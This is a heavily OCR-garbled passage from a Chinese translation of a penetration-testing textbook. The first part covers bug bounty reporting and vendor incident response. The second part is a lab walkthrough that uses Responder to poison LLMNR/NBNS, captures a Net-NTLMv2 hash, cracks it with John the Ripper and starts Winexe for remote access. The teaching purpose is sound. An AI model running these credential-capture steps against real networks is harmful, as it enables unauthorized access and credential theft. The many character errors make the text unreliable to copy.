换 句 话说 ， 研 究 人 员 必 须 与 供应 商 进 行 协 商 才 能 进行 披露 ， 很 可 能 需要 征 得 供应 商 
的 许可 。 但 有 时 也 可 协商 ， 因 为 供应 商 想 与 研究 人 员 和 平 相处 ， 让 研究 人 员 筑 得 合 
乎 情理 ， 以 免 研 究 人 员 目 行 披 露 。 在 最 佳 情 况 下 ， 供 应 商 和 研究 人 员 将 达到 双 最 的 
结局 一 一 研究 人 员 很 快 收 到 回报 ， 而 供应 商 则 可 及 时 地 解决 安全 问题 。 当 然 这 种 情 
况 下 ， 也 给 公众 市 来 了 好 处 。 


9.44 AX; 


找到 目标 后 ， 接 着 注册 (如 有 必要 )， 阅 读 条 款 和 条 件 ， 此 后 就 开始 寻找 漏洞 。 
如 本 书 所 述 ， 为 完成 这 项 任务 ， 你 可 以 使 用 多 种 方法 ， 如 模糊 测试 、 代 码 分 析 ， 以 
及 对 应 用 程序 进行 静态 测试 和 动态 安全 测试 等 。 每 个 研究 人 员 都 会 使 用 对 目 己 而 言 
最 合适 的 过 程 ， 但 以 下 基本 步骤 是 必需 的 : 

e 列 出 攻击 面 ， 包 括 端口 和 协议 (OSI 第 1 层 ~ 第 7 层 ) 
“踩点 ”应 用 程序 (OSI 第 7 层 ) 
评估 身份 验证 (OSI 第 5 层 ~ 第 7 层 ) 
评估 授权 (OSI 第 7 层 ) 
评估 输入 验证 (OSI 第 1 层 ~ 第 7 层 ， 具 体 取决 应 用 程序 或 设备 ) 
评估 加 密 (OSI 第 2 层 ~ 第 7 层 ， 具 体 取 决 应 用 程序 或 设备 ) 

每 个 步骤 都 包含 子 步 又， 都 可 能 发 现 潜在 的 漏洞 。 
945 “报告 漏洞 

并 非 所 有 漏洞 报告 都 是 等 价 的 ， 也 并 非 所 有 漏洞 都 能 得 到 及 时 修复 。 但 研究 人 
员 可 以 做 一 些 事情 , 提高 研究 人 员 的 问题 得 到 修复 以 及 收 到 黄金 的 概率 。 研 究 表明 ， 
具有 堆栈 跟踪 和 代码 段 ， 而 且 清 晰 易 懂 的 漏洞 报告 更 可 能 使 漏洞 得 到 修复 。 这 是 合 
理 的 ,为 开发 人 员 提 供 方便 ， 研究 人 员 也 更 可 能 得 到 想 要 的 结果 。 毕 况 ， 因 为 研究 
人 员 是 一 名 道德 黑客 ， 研 究 人 员 确 实 希 望 及 时 修复 漏洞 ， 是 吗 ? 老话 说 得 没 错 : 与 
用 醋 捕 捉 苍 蝇 相 比 ， 用 密会 捕捉 得 更 多 。 简 单 来 讲 ， 研 究 人 员 提 供 的 信息 越 多 ， 越 
清晰 明了 ， 越 容易 重复 ， 研 究 人 员 越 可 能 得 到 贫 金 ， 被 视 为 “重复 发 现 ” 的 概率 
越 低 。 
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9.46 ”领取 党 


在 漏洞 报告 得 到 确认 ， 并 被 证 明 是 第 一 次 发 现 后 ， 研 究 人 员 应 当 收 到 黄金 。 黄 
金 的 形式 有 多 种 : 现金 、 借 记 卡 和 比特 币 。 法 规 要 求 ， 如 果 赏 金 超过 两 万 美元 ， 那 
么 供应 商 或 漏洞 黄金 计划 平台 提供 商 必 须 癌 IRS( 关 国 国税 局 ) 报 告 。 无 论 何 时 ,研究 
人 员 部 应 当 咨 询 税 务 顾 问 ， 了 解 因 参 与 漏洞 入 金 计划 所 获 收 入 应 缴纳 的 税金 。 


9.5 ”事故 响应 


前 面 从 攻击 方 的 角度 进行 讨论 。 下 面 调转 镜头 ， 再 看 一 下 防御 方 。 组 织 应 当 如 
何 处 理 安全 事故 报告 ? 


9.5.1 沟通 


无 论 对 于 哪 种 漏 铜 员 金 计划 ， 沟 通 都 至 关 重 要 。 首 先 ， 研 究 人 员 与 供应 商 之 间 
MERRER E. WRA, Anpe LEME, REAREN -HANER 
布 ， 这 时 的 结局 往往 不 好 。 而 如 果 尽 早 建立 沟通 渠道 ， 并 频 党 进行 沟通 ， 则 研究 人 
员 和 供应 商 之 间 将 建立 联系 ， 双 方 更 可 能 对 结果 感到 满意 。Bugcrowd、HackerOne 
和 SynAck 等 漏洞 贯 金 计 划 平 台 的 重要 作用 丈 是 沟通 。 这 是 这 几 个 平台 能 够 生存 的 主 
要 原因 ， 它 们 能 促进 各 方 之 间 进 行 公 平公 正 的 交 汶 。 大 多 数 研究 人 员 都 希望 尽快 收 
到 回复 信息 ， 供 应 了 商 则 希望 在 24~48 小 时 内 啊 应 研究 人 员 。 当 然 ， 无 论 如 何 ， 供 应 
商 的 回复 时 间 都 不 能 超过 72 小 时 。 

作为 一 名 供应 商 ， 如 果 准 备 计 划 运 和 营 目 己 的 漏洞 黄金 计划 ， 或 接 入 其 他 任何 漏 
洞 接收 门户 ， 务 必要 确保 研究 人 员 可 以 方便 地 确定 如 何在 供应 商 的 站 点 报告 漏洞 。 
另外 ， 要 清晰 地 解释 如 何 与 研究 人 员 交 流 ， 明 确 说 明 供 应 商 准 备 在 合理 的 时 间 范 转 
内 啊 应 所 有 消息 。 通 币 ， 当 研究 人 员 对 供应 商 失 去 信心 时 ， 驶 会 列 出 供应 商 拒 不 回 
应 和 拒绝 沟通 的 事实 。 这 可 能 导致 研究 人 员 甩 开 供 应 商 直 接 同 公众 公开 漏 铜 。 供 应 
商 要 意识 到 并 避 开 这 个 陷阱 。 研 究 人 员 在 公开 漏 铜 前， 通 第 持 有 供应 商 需 要 成 功 修 
复 的 关键 信息 。 研 究 人 员 与 供应 商 要 抓 住 让 这 个 过 程 得 以 顺利 进行 的 关键 : 沟通 。 


9.52 ”鉴别 和 分 级 


收 到 漏 铜 报告 后 ， 需 要 执行 鉴别 和 分 级 (Triage) 工 作 ， 以 便 快 速 鉴 别 哪些 问题 是 
有 效 和 唯一 的 ， 此 后 再 进一步 确定 严重 程度 。 通 用 漏洞 评分 系统 (Common 
Vulnerability Scoring System，CVSS) 和 通用 弱点 评分 系统 (Common Weakness Scoring 
System, CWSS) 有 助 于 完成 鉴别 和 分 级 工作 ,CVSS 的 驱动 力 更 强 , CVSS 基 于 Base( 基 
础 )、Temporal( 时 间 ) 和 Environmental( 坏 境 ) 等 因 系 进行 评估 。 网 上 也 有 一 些 计算 胡 可 
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用 于 确定 特定 软件 漏洞 的 CVSS 分 数 。CWSS 的 驱动 力 弱 一 些 ， 自 从 2014 年 以 来 就 没 
有 更 新 过 ; 不 过 ，CWSS 提 供 的 上 下 文 信息 更 多 ， 通 过 引入 Base( 基 础 )、Attack 
Surface( 攻 击 面 ) 和 Environmental( 环 境 ) 对 漏洞 的 功能 进行 分 级 。 通 过 使 用 CVSS 和 
CWSS， 供 应 商 可 对 汤 洞 和 弱点 进行 分 级 ， 从 而 在 内 部 决定 哪 一 个 优先 级 更 高 ， 并 
按 顺 友 给 最 匪 前 的 问题 分 配 资 源 ， 以 求 尽快 解决 。 


953 修复 


修复 (Remediatiom) 是 披露 漏洞 的 主要 目的 。 毕 竟 ， 如 果 供 应 商 不 准备 及 时 解决 
问题 ， 研 究 人 员 将 同 公 众 完全 披露 漏洞 ， 以 迫使 供应 商 进行 修复 。 因 此 ， 供 应 丙 必 
须 制 定 一 个 时 间 表 ， 及 时 地 修复 安全 漏洞 ， 修 复 时 间 通 党 是 30~45$ 天 。 大 多 数 研 究 
人 员 愿 意 等 待 这 么 长 时 间 ， 如 果 途 期 ， 将 对 公众 公开 漏洞 ， 否 则 ， 研 究 人 员 会 与 供 
应 商 在 第 一 时 间 进 行 沟 通 。 

不 仅 要 解决 漏洞 ， 还 要 审查 附近 的 代码 或 类 似 的 代码 ， 确 认 是 否 存 在 相关 的 弱 
点 。 换 言 之 ， 供 应 商 应 当 抓 住 机 会 顺便 在 所 有 代码 库 中 通 查 此 类 漏洞 ， 以 免 下 一 个 
月 ， 男 一 个 产品 义 站 在 风口 浪 尖 上 。 男 外 ， 要 避免 出 现 修 复 了 一 个 漏洞 ， 却 引出 男 
一 个 漏洞 的 情况 。 研 究 人 员 将 核实 补丁 ， 并 确保 供应 商 并 非 只 是 歼 衍 了 事 或 给 漏洞 
加 一 层 伪 装 。 


954 BAPAE 


是 否 回 用 户 公 开 漏 铜 是 一 个 问题 。 有 些 情 况 下 , 如果 研 究 人 员 拿 到 足够 的 党 金 ， 
则 供应 商 可 阻止 研究 人 员 未 经 他 们 同意 就 公开 漏洞 。 不 过 ， 在 实际 中 ， 真 相 总 会 浮 
出 水 面 , 要么 是 研究 人 员 主 动 说 出 , 要 么 是 其 他 一 些 匿 名 的 好 事 者 在 网 上 公布 出 来 。 
因此 ， 作 为 供应 商 ， 应 当 辐 用 户 公 开 安 全 问题 ， 包 括 漏洞 的 一 些 基 本 信息 、 安 全 问 
题 定性 、 潜 在 影响 以 及 修复 方式 。 


9.5.5 公关 


对 于 用 尸 群 体 而 言 , 同 公 众 公 开 的 漏洞 信息 至 关 草 要 ,用户 可 从 中 了 解 到 问题 ， 
并 真正 打 补 丁 。 在 最 佳 情 形 中 ， 供 应 商 和 研究 人 员 将 协商 披露 方式 ， 供 应 商会 给 人 研 
完 人 员 做 适当 信用 评级 (如 果 需 要 )。 研 究 人 员 随 后 和 目 行 扳 露 并 表扬 与 供应 商 的 合作 ， 
这 种 情况 十 分 第 见 。 对 于 供应 商 而 言 ， 这 是 一 个 积极 现象 。 在 其 他 情况 下 ， 一 方 可 
能 先行 一 步 ， 用 户 可 能 会 受到 念 害 。 如 果 拔 露 方式 未 经 沟通 ， 用 户 可 能 感到 困惑 ， 
甚至 未 意识 到 问题 的 严重 性 ， 因 此 未 及 时 打 补 本 。 其 他 各 方 可 能 参与 进来 ， 这 可 能 
18 32 73 — Ma A AS. 
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9.6 本章 小 结 


本 章 讨 论 源 凋 黄金 计划 。 首 先 讨论 有 天 披露 的 历史 人 信息， 说明 创 建 漏洞 芝 金 计 
划 的 原因 。 接 着 讨论 不 同类 型 的 漏 铜 员 金 计划 ， 重 点 拍 述 了 Bugcrowd 平 侣 。 此 后 讨 
论 如 何 过 过 友 现 漏洞 (Bug) 诬 生 。 最 后 加 供应 商 提 出 一 些 啊 应 漏洞 报告 的 实用 建议 。 
阅读 本 重 内 容 后 ， 不 管 是 研究 人 员 还 是 供应 商 ， 者 将 能 更 好 地 处 理 漏洞 报告 。 
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不 使 用 漏洞 获取 权限 

基本 的 Linux 漏 洞 攻 击 

基本 的 Windows 漏 铜 攻击 
高 级 的 Windows 漏 洞 攻 击 
PowerShell 漏 洞 攻击 

下 一 代 Web 应 用 程序 漏洞 攻击 
下 一 代 补 丁 漏洞 攻击 


第 10 x 不 使 用 涯 尊 获 取 权 限 


在 渗透 测试 中 ， 一 个 草 要 原则 是 “秘密 行动 友 现 灰 幅 黑客 行踪 的 时 间 越 早 ， 
防御 者 就 会 越 及 时 地 采取 措施 阻止 评 佑 人 员 的 行动 。 因 此 ， 最 好 使 用 网 络 上 看 似 目 
然 的 工具 ， 或 者 不 会 引起 用 户 注意 的 实用 工具 ; 这 是 在 敌 方 眼皮 底下 工作 的 方式 之 
一 。 本 章 将 介绍 一 些 方法 ， 通 过 使 用 目标 系统 上 的 原生 工具 获得 访问 权限 ， 并 在 环 
境 中 模 回 移动 。 


本 章 涵 兰 的 主题 如 下 : 

e 捕获 口令 (Password) 哈 希 
e 使 用 Winexe 

e 使 用 WMI 

e 利用 WinRM 


10.1 捕获 口令 了 哈市 


本 章 分 析 如 何在 不 使 用 漏洞 Gxploib 的 情况 下 获得 对 系统 的 访问 权 。 必 须 死 服 
的 第 一 个 挑战 是 如 何 获 得 这 些 目 标 系统 的 和 凭证。 本草 将 Windows 10 作 为 重点 目标 ， 
首先 需要 了 解 可 以 捕获 哪些 哈 布 ， 其 次 需要 了 解 如 何 利 用 这 些 哈 希 。 


10.1.1 理解 LLMNR 和 NBNS 


当 碍 看 DNS 名 称 时 ，Windows 系 统 执 行 多 个 步 又 以 将 DNS 名 称 目 动 转换 为 卫 地 
址 。 首 先 搜 索 本 地 文件 ，Windows 将 在 主机 或 系统 上 的 LMHosts 文 件 中 搜索 ， 看 文 
件 中 是 人 否 存在 该 项 。 如 有 果 不 存 在 该 项 ， 接 痢 查询 DNS。Windows 将 DNS 否 询 上 友 送 到 
默认 的 域名 解析 服务 磺 ， 看 能 侣 找到 该 项 。 大 多 数 情况 下 ， 域 名 解析 服务 堪 将 返回 
答案 ， 你 将 看 到 想 要 连接 到 的 网 页 或 目标 主机 。 

在 DNS 失败 的 情况 下 ， 现 代 Windows 系 统 使 用 两 个 协议 符 试 解析 本 地 网 络 上 的 
主机 名 。 第 一 个 是 链 路 本 地 多 播 名 称 解析 (Link Local Multicast Name Resolution, 
LLMNR)。 顾 名 思 义 ， 访 协议 使 用 多 播 方式 答 试 得 找 网 络 上 的 主机 。 其 他 Windows 
系统 将 订阅 多 播 地 址 ， 一 台 主 机 发 出 请 求 时 ， 如 果 听 到 的 任何 参与 方 拥有 相应 的 名 
称 并 可 将 其 转换 为 IP 地 址 ， 束 会 啊 应 。 接 收 啊 应 后 ， 系 统 就 可 以 连接 到 相应 的 主机 。 
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另外 ， 如 果 无 法 使 用 LLMNR 找 到 主机 ，Windows 会 采用 另 一 种 方法 尝试 查找 主 
机 。NetBIOS 名 称 服 务 (NetBIOS Name Service, NBNS)f& HNetBIOS ALZA HUP 
地 址 。 为 此 ， 将 主机 的 广播 请 求 发 送 到 本 地 子 网 ， 然 后 等 待 其 他 参与 方 啊 应 请 求 。 
如 果 一 台 主 机 上 存在 该 名 称 ， 就 可 以 直接 啊 应 ， 系 统 就 可 以 了 解 到 : 要 获得 资源 ， 
需要 去 往 相 应 的 地 址 。 

LLMNR 和 NBNS 依 赖 于 信任 。 在 普通 环境 中 ， 只 有 作为 被 搜索 的 主机 时 ， 相 应 
主机 才 啊 应 这 些 协 议 。 参 与 者 可 啊 应 发 送 到 LLMNR 或 NBNS 的 任何 请 求 ， 并 声称 拥 
有 正在 搜索 的 主机 。 当 系统 转 到 相应 地 址 时 ， 将 尝试 协商 与 本 地 的 主机 连接 ， 这 样 
就 可 以 获得 尝试 与 本 地 主机 连接 的 账户 的 信息 。 


10.1.2 ”理解 Windows NTLMv1 和 NTLMv2 身 份 认证 


当 Windows 主 机 相互 之 间 通 信 时 ， 系 统 可 采用 多 种 方式 进行 身份 认证 ， 如 通过 
Kerberos、 证 书 和 Net-NTLM 等 。 本 节 重 点 讨论 的 第 一 个 协议 是 Net-NTLM。 顾 名 思 
义 ，Net-NTLM 可 更 安全 地 在 网 络 上 发 送 Windows NT LAN 管 理 器 (NT LAN 
Manager，NTLMD) 哈 希 。 在 Windows NTZ. Bj, LANTEZEZS(LAN Manager，LM) 哈 希 
用 于 基于 网 络 的 对 份 认 证 。 使 用 数据 加 密 标准 (Data Encryption Standard，DES) 加 密 
方式 生成 LM 哈 希 。LM 哈 希 存在 一 个 弱点 ，LM 哈 希 实际 上 是 两 个 不 同 哈 希 的 结合 
体 。 可 将 一 个 口令 转换 为 大 与 形式 ， 然 后 填 允 空 字符 ， 直 全 到 达 14 个 字符 为 止 ， 此 
后 ， 将 所 用 口令 的 前 半 部 分 和 后 半 部 分 创建 为 哈 希 的 两 个 部 分 。 随 看 技术 的 进步 ， 
这 成 了 一 个 巨大 的 弱点 ， 因 为 可 分 别 破解 前 后 两 部 分 口令 。 这 意味 看 ， 口 令 破 解 需 
最 多 只 需要 破解 两 个 7 字符 长 的 口令 。 

随 看 彩虹 表 (Rainbow Table) 的 出 现 ， 口 令 破 解 变 得 更 容易 ， 因 此 Windows NT 改 
用 NITLM 哈 希 。 可 对 任何 长 度 的 口令 进行 哈 硕 处 理 ， 使 用 RC4 算 法 生成 哈 和 布什。 对 
于 基于 主机 的 喘 份 认证 而 言 ， 这 更 安全 ， 但 基于 网 络 的 号 份 认证 存在 一 个 问题 。 如 
果 有 恶意 攻击 者 侦 听 正在 传送 的 原始 NTLM 哈 希 ， 如 何 阻 止 恶 意 攻 击 者 获取 哈 希 值 
并 重 放 呢 ? 因此 ， 人 们 创建 了 Net-NTLMv1 和 Net-NTLMV2 质 询 / 响 应 哈 希 ， 给 哈 希 
值 添 加 随机 性 ， 增 加 破解 时 间 。 

NetrNTLMV1 使 用 基于 服务 磺 的 Nonce( 有 时 详 作 “现时 ”， 表 示 加 密 通 信 中 只 使 
用 一 次 的 值 ) 增 加 随机 性 。 当 使 用 Net-NTLMv1 连 接 到 主机 时 ， 首 先 要 求 获得 Nonce。 
接 下 来 ， 获取 NTLM 哈 希 ， 使 用 Nonce 再 次 执行 哈 名 操作。 然后 将 结果 发 送 到 服务 器 
进行 里 份 认证 。 如 果 服 务 右 知道 NTLM 哈 希 ， 可 使 用 友 送 的 质询 草 新 创建 质询 蛤 厦 。 
如 果 二 者 匹配 ， 则 口令 正确 无 误 。 访 协议 的 问题 在 于 : 恶意 攻击 者 可 诱 使 他 人 连接 
到 攻击 者 的 服务 器 , 并 提供 静态 Nonce。 这 意味 着 , Net-NTLMv1 哈 希 只 比 原始 NTLM 
凭证 稍微 复杂 一 些 , 攻击 者 破解 Net-NTLMv1 哈 希 与 破解 原始 NTLM 哈 希 一 样 快 。 鉴 
于 此 ， 人 们 又 创建 了 NetrNTLMV2。 
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Net-NTLMV2 在 创建 质询 哈 希 时 , 提供 两 种 不 同 的 Nonce。 98 FH EH BR AS asda » 
第 二 种 由 客户 端 指 定 。 无 论 服 务 右 是 否 受到 攻击 ， 是 人 否 具 有 静态 Nonce， 客 户 端 都 
将 通过 Nonce 增 加 复杂 性 ， 从 而 降低 了 破解 凭证 的 速度 。 这 也 意味 着 ， 彩 虹 表 不 再 
是 人 破解 此 类 哈 希 的 有 效 方式 。 


d 注意 : 有 必要 指出 ， 质 询 哈 布 不 能 用 于 pass-the-hash 攻 击 。 如 果 不 清楚 自己 
\_ 写 ”正在 处 理 哪 类 哈 希 ， 请 参阅 本 章 “ 扩 展 阅读 ”中 的 hashcat 哈 希 类 型 引用 . 
使 用 提供 的 URL 识 别 正在 处 理 的 哈 希 的 类 型 。 


10.1.3 使 用 Responder 


为 捕获 哈 希 ， 需 要 使 用 程序 诱 使 受害 者 主机 提供 Net-NTLM 哈 希 。 为 获得 这 些 
哈 希 , 需要 使 用 Responder 回 答 发 出 的 LLMNR 和 NBNS 查 询 。 可 以 在 服务 器 端 使 用 固 
定 的 质询 ， 因 此 只 需要 处 理 一 组 (而 非 两 组 ) 随 机 性 。 


1. 获取 Responder 


Responder” A E T Kali Linux 发 行 版 本 ， 但 Kali 的 更 新 速度 与 Responder 创 建 者 
Laurent Gaffie 提 交 更 新 的 速度 有 时 不 合拍 。 因 此 ， 可 以 使 用 git 下 载 最 新 的 Responder 
版 本 。 为 确保 获得 需要 的 所 有 软件 ， 要 确认 已 经 在 Kali 上 安装 了 生成 工具 : 


# apt-get install build-essential git python-dev 


安 疼 git 后 ， 需 要 克隆 存储 库 。 殉 隆 存 储 库 时 ， 将 下 载 源 代 码 ， 并 创建 一 个 便于 
更 新 软件 的 位 置 。 要 克隆 存储 库 ， 可 执行 以 下 操作 : 


root@kali:~ # git clone https://github.com/lgandx/Responder.git 
Cloning into 'Responder'... 

remote: Counting objects: 1324, done. 

remote: Total 1324 (delta 0), reused O0 (delta 0), pack-reused 1324 
Receiving objects: 100$ (1324/1324), 1.53 MiB | 0 bytes/s, done. 
Resolving deltas: 100$ (860/860), done. 


为 更 新 存储 库 ， 只 需要 完成 以 下 操作 : 


root@kali:~/Responder # cd Responder/ 

root@kali:~/Responder # git pull 

Already up-to-date. 

如 果 存 在 更 新 包 ， 将 立即 更 新 Responder 的 代码 。 通 过 在 执行 有 验证 Responder 
的 代码 是 侣 是 最 新 的 ， 可 确保 使 用 最 新 技术 充分 利用 Responder。 
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2. 运行 Responder 


安装 Responder 后 ， 现 在 分 析 可 使 用 的 一 些 选 项 。 首 先 看 heljp 选 项 : 


root@kali:~/Responder # ./Responder.py -h 


NBT-NS, LLMNR & MDNS Responder 2.3.3.0 


Author: Laurent Gaffie (laurent.gaffie@gmail.com) 
To kill this script hit CRTL-C 


Usage: python ./Responder.py -I ethO0 -w -r -f 
or: 
python ./Responder.py -I eth0 -wrf 


Options: 
--version show program's version number and exit 
=h; -—-help show this help message and exit 
-A, --analyze Analyze mode. This option allows you to see NBT-NS, 


BROWSER, LLMNR requests without responding. 

1 eth0, --interface=eth0 
Network interface to use, you can use 'ALL' as a 
wildcard for all interfaces 

=1 10.0.0.21, —-3p-10.D.B8.21 
Local IP to use (only for OSX) 

-e 10.0.0.22, —--externalıp=10.0.0.22 
Poison all requests with another IP address than 
Responder's one. 

-b, —-basic Return a Basic HTTP authentication. Default: NTLM 

UU. ——Wredir Enable answers for netbios wredir suffix queries. 
Answering to wredir will likely break stuff on the 
network. Default: False 

-d, --NBTNSdomain Enable answers for netbios domain suffix queries. 
Answering to domain suffixes will likely break stuff 
on the network. Default: False 

Q-t, --fingerprint This option allows you to fingerprint a host that 
issued an NBT-NS or LLMNR query. 

Q9-v, -—wpad Start the WPAD rogue proxy server. Default value is 
False 

-u UPSTREAM PROXY, --upstream-proxy-UPSTREAM PROXY 
Upstream HTTP proxy used by the rogue WPAD Proxy for 
outgoing requests (format: host:port) 

-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file 
retrieval. This may cause a login prompt. Default: 
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False 

-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) 
authentication for the proxy. WPAD doesn't need to be 
ON. This option is highly effective when combined with 
-r. Default: False 

-—1m Force LM hashing downgrade for Windows XP/2003 and 
earlier. Default: False 

-v, --verbose Increase verbosity. 

上 面 列 出 了 很 多 选项 。 可 以 分 析 其 中 最 有 用 但 不 会 造成 破坏 的 选项 。 一 些 选项 
(如 wrediD 将 在 一 定 条 件 下 破坏 网 络 。 同 时 ， 一 些 操作 会 骏 露 用 尸身 份 ， 如 强制 实施 
基本 号 份 认证 。 此 时 ， 妥 害 者 将 看 到 一 个 对 话 框 ， 要 求 输 入 用 户 名 和 口令 。 这 人 么 做 
的 好 处 在 于 将 获得 明文 口令 ， 坏 处 在 于 可 能 让 用 户 产 生 警 觉 。 

介绍 完 注 意 事项 后 , 下 面 分 析 如 何 调用 Responder。 最 重要 的 选项 是 指定 接口 @。 
在 本 次 测试 中 ， 将 使 用 主要 网 络 接口 eth0。 如 果 本 次 测试 所 使 用 的 系统 有 多 个 接口 ， 
可 指定 替代 接口 或 使 用 ALIL 侦 听 所 有 接口 。 接 下 来 要 指定 的 选项 是 fmngerprint 候 。 该 
选项 提供 一 些 在 网 络 上 使 用 NetBIOS 的 主机 的 基本 信息 ， 如 正在 查找 的 名 称 和 主机 
OS 版 本 。 可 全 此 了 解 网 络 中 存在 哪些 不 同类 型 的 环境 。 

Ig ri ix ELWPADJIRAS a ©. Web 代理 目 动 恢复 (Web Proxy Auto-Discovery, WPAD) 
协议 供 Windows 设 备查 找 网 络 上 的 代理 服务 右 。 如 果 Kali 环 境 直 接连 接 到 Internet， 
则 尽 可 以 使 用 WPAD 技 术 。 但 如 果 在 所 在 的 网 络 上 ，Kali 环 境 必 须 经 由 代理 ， 这 将 
破坏 要 被 投 毒 Poisom) 的 客户 病 ， 因 此 不 要 使 用 。 设 置 WPAD 的 优点 在 于 ， 如 采 主 机 
寻找 用 于 Web 的 WPAD 服 务 器 , 任何 Web 流 量 都 将 触发 Responder 投 毒 从 而 获取 哈 希 ， 
否则 ， 则 必须 等 竺 有 人 访问 并 不 存在 的 共享 。 


10.1.4 ”实验 10-1: 使 用 Responder 获 取 口 令 


cow 注意 : 本 实验 提供 README 文 件 ， 说 明 如 何 为 本 实验 及 本 章 后 面 的 实验 设 


^N 
IN 


t> 置 网 络 。 在 继续 之 前 ， 应 当 阅 读 该 文件 ， 这 可 以 确保 可 以 完成 后 续 实 验 。 


上 和 面 讨论 了 基础 知识 ， 下 面 将 这 些 知识 运用 于 实践 。 在 测试 的 网 络 中 ， 己 经 配 
备 了 Windows 10 服 务 器 ,使 用 了 README 文 件 中 指定 的 设置 。 需 要 确保 系统 都 在 同 
一 网 络 环境 中 。 此 后 运行 Responder 并 局 动 投 毒 过 程 : 

# ./Responder.py -wf -I etho 


« Banners and some output eliminated for brevity 


[+] Poisoning Options: 


Analyze Mode [OFF ] 
Force WPAD auth [OFF] 
Force Basic Auth [OFF] 
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Force LM downgrade [OFF] 
Fingerprint hosts [ON] 


[+] Generic Options: 


Responder NIC [eth0] 
Hesponder IP [192.168.1.92] 
Challenge set [ random] 


Don't Respond To Names ['ISATAP'] 


[+] Listening for events... 


Responder EAR FIARA. HERT, 可 以 使 用 Windows 10 主 机 回 不 存在 的 共 吾 友 


出 简单 请 求 ，Responder 将 完成 其 余 工作 。 


从 图 10-1 可 以 看 到 ， 在 尝试 访问 共享 时 ，Windows 系 统 只 返回 一 条 “Access is 


deniesd” 消 息 。 在 Windows 系 统 上 看 不 到 其 他 任何 异 帝 行为。 但 在 Kali 环 境 中 ， 可 看 
到 大 量 活动 : 


[3 [*] [NBT-NS] Poisoned answer sent to 192.168.1.13 for name 
NOTAREALHOST 

(service: File Server) 

[FINGER] OS Version : Windows 10 Enterprise 15063 

[FINGER] Client Version : Windows 10 Enterprise 60.3 

© [*] [LLMNR] Poisoned answer sent to 192.168.1.13 for name 
NOTAREALHOST 


[FINGER] OS Version : Windows 10 Enterprise 15063 
[FINGER] Client Version : Windows 10 Enterprise 6.3 
[SMBv2] NTLMv2-SSP Client =- 192.168.1.13 


[SMBv2] NTLMv2-SSP Username : DESKTOP-KRB3MSI\User 

© [sMBv2] NTLMv2-SSP Hash 
User::DESKTOP-KRB3MSI:f302ca2/7a4602ce8:5C37059307A58DA44A4EEC8 7E96F6 
96DF1:0101000000000000C0653150DE09D2016DCBA4AO0D9CBA51E3000000000200 
O80053004D004200330001001E00570049004E002D005000520048003 400390032 
00520051004100460056000400140053004D00420033002E006C006F0063006100 
6C0003003400570049004E002D0050005200480034003900320052005100410046 
0056002E0053004D00420033002E006C006F00630061006C000500140053004D00 
420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002 
000000080030003000000000000000010000000020000030CB99C348D4BA4FDOB66 
15CA3E5A16D516B561BD859B2D9A6DPF404A2A9EE8B850A00100000000000000000 
0000000000000000000900220063006900660073002F004E004F00540041005200 
450041004C0048004F0053005400000000000000000000000000 
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EN C:\Windows\system32\cmd.exe 


:\Users\Usery\\NOTAREALHOST\NOTAREALSHARE‘\notarealfile.exe 
Access is denied. 


C:\Users\User> 


图 10-1 从 不 存在 的 共享 中 请 求 文件 


注意 ， 正 在 完成 两 类 不 同 的 投 毒 。 第 一 类 是 NBNS 仿 ， 第 二 关 是 LLMNR 怠 . F 
借 指 纹 , 两 个 请 求 都 能 提供 关于 基础 主机 OS 的 信息 , 可 以 看 到 所 请 求 主 机 的 IP 地 址 ， 
以 及 正在 答 试 连接 到 哪个 系统 。 获 得 的 最 后 一 个 数据 请 段 是 NetrtNITLMV2 哈 而 以 及 
用 户 名 全。 可 尝试 破解 质证 ， 看 看 该 作证 能 侍 可 用 于 访问 系统 。 

得 到 了 有 效 的 哈 希 后 ， 在 Responder 窗 口中 按 下 CtritC 停 止 运行 。 下 一 步 将 
Responder P HIIS A -= H John the Ripper 可 以 处 理 的 格式 。 


# ./DumpHash.py 

Dumping NTLMV2 hashes: 
User::DESKTOP-KRB3MSI:f302ca27a4602ce8:5C37059307A58DAA4AEEC87E96F6 
96DF1:0101000000000000C0653150DE09D2016DCBA4A0D9CBA51E3000000000200 
080053004D004200330001001E00570049004E002D005000520048003400390032 
00520051004100460056000400140053004D00420033002E006C006F0063006100 
6C0003003400570049004E002D0050005200480034003900320052005100410046 
0056002E0053004D00420033002E006C006F00630061006C000500140053004D00 
420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002 
000000080030003000000000000000010000000020000030CB99C348DA4BA4FDOB66 
15CA3E5A16D516B561BD859B2D9A6DFA404A2A9EE8B850A00100000000000000000 
0000000000000000000900220063006900660073002F004E004F00540041005200 
450041004C0048004F0053005400000000000000000000000000 


Dumping NTLMv1 hashes: 


可 在 这 里 看 到 Net-NTLMv2 蛤 硕 ， 你 在 该 目录 中 看 到 创建 了 两 个 新 文件 : 
DumpNTLMv2.txt 和 DumpNTLMv1.txt。 可 以 知道 ， 传 递 给 Responder 的 哈 希 是 版 本 
2(vV2)， 因 此 只 需要 针对 v2 文件 运行 John the Ripper， 看 能 否 破 解 口 令 : 


# john DumpNTLMv2.txt 

Using default input encoding: UTF-8 

Rules/masks using ISO-8859-1 

Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/32]) 
Press 'q' or Ctrl-C to abort, almost any other key for status 
Passwordl (User) 

1g 0:00:00:00 DONE 2/3 (2017-08-23 21:13) 9.090g/s 158027p/s 158027c/s 
158027C/s Passwordl 

Use the "--show" option to display all of the cracked passwords reliably 
Session completed 
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John the Ripper 成 功 破 解 了 口令 ， 发 现 User 用 户 的 口令 是 Passwordl。 有 了 这 些 
赁 证， 将 可 在 远程 访问 系统 。 本 章 其 余部 分 将 使 用 这 些 赁 证， 与 受害 计算 机 进一步 


交互 。 
10.2 ”使 用 Winexe 


Winexe 是 一 个 在 Linux 上 运行 的 Windows 系 统 远程 管理 工具 。 使 用 Winexe， 可 在 

目标 系统 上 运行 应 用 程序 ， 或 打开 一 个 交互 式 命令 所 示 窗 口 。 男 一 个 好 处 是 ， 如 果 

所 攻击 系统 的 用 户 提 升 T% 玫 证 权限 ， 渗 透 测试 人 员 同 样 可 以 请 求 Winexe 将 shell 作 为 
“系统 (System) ”局 动 ， 这 样 一 来 ， 可 在 系统 上 获得 更 多 权限 。 


10.2.1 实验 10-2: 使 用 Winexe 访 问 远 程 系 统 


恶意 攻击 者 利用 Responder 获 得 了 受害 系统 的 口令 , 但 如 何 与 党 害 系统 交互 呢 ? 
